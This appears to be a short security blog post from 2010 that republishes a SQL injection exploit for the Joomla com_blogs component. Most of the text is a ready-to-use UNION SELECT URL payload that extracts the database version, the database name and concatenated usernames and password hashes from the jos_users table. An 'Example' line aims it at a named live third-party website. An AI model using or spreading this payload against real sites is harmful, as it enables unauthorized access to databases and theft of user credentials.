~[+] Exploit Title: Joomla Component Blogs SQL injection vulnerability
~[+] Author : ibl13Z [at]hackermail.com
~[+] Vulnerable :
http://127.0.0.1/index.php?option=com_blogs&task=details&b_id=[CrutZ]
~[+] Exploit:
/index.php?option=com_blogs&task=details&b_id=173 /**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--
~[+] Example :
http://www.mumcentremalaysia.com/index.php?option=com_blogs&task=details&b_id=173 /**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--
Saturday, September 11, 2010
Joomla Component com_blogs SQL injection vulnerability
0
About Me
- За Zer0-0ne
- Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4
0 comments:
Post a Comment